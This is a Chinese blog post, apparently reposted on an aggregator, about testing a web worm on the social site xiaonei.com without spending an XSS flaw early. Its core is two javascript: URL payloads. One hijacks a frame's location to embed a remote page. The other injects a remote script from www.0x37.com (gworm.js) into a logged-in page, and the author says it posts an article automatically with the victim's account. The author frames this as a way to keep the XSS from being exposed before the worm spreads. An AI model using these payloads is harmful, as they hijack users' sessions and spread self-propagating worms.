zoukankan      html  css  js  c++  java
  • 同域内测试蠕虫的一种方法

    汗……本来在讨论这个的http://www.gnucitizen.org/blog/ghost-busters/,有意思:

    <a href="javascript:x=open('http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20'http://127.0.0.1/myframe.html';}}}catch(e){}},3000);void(1);">Sample PoC Here.</a>

    打 开代码中javascript链接时,远程的myframe.html会被嵌入到www.xiaonei.com上。详细的见上面这个网址。很快我就想是 否能同理于<iframe>将<script>里的src替代为我的远程js呢?不行……上面代码x代表一个window对 象,iframe内嵌框架的父级对象就是window,而script标签的父级对象是document。当open一个新窗口时,我们仅能获取这个 window对象。其他的怎么回事。我迷糊了。回归主题:同域内测试蠕虫的一种方法。

    我这拿校内网做实验,在浏览器地址栏直接输入(你可以试试下面这段代码,执行后会自动帮你发一篇新文章):

    javascript:x=open('http://home.xiaonei.com/Home.do');setTimeout("document.scripts[0].src='http://www.0x37.com/Project/gworm.js'",3000);void(1);

    这样gworm.js就可以为所欲为了(依赖于你的校内网帐户权限),代码的执行效率可比手动高得多:)。以后就没必要每次测试蠕虫时就利用一次XSS,这样可以防止XSS Trap在没爆发之前暴露:)

    from:http://www.0x37.com/post/15.html
  • 相关阅读:
    Codeforces610b
    Codeforces597A
    Timus1014(贪心算法)
    一般贪心
    优先队列问题(此题来源哈尔滨理工大学VJ)
    POJ2551Dungeon Master
    LightOJ 1140: How Many Zeroes? (数位DP)
    HDU 2089:不要62(数位DP)
    HDU 4722:Good Numbers(数位DP)
    HDU 3709: Balanced Number (数位DP)
  • 原文地址:https://www.cnblogs.com/top5/p/1605160.html
Copyright © 2011-2022 走看看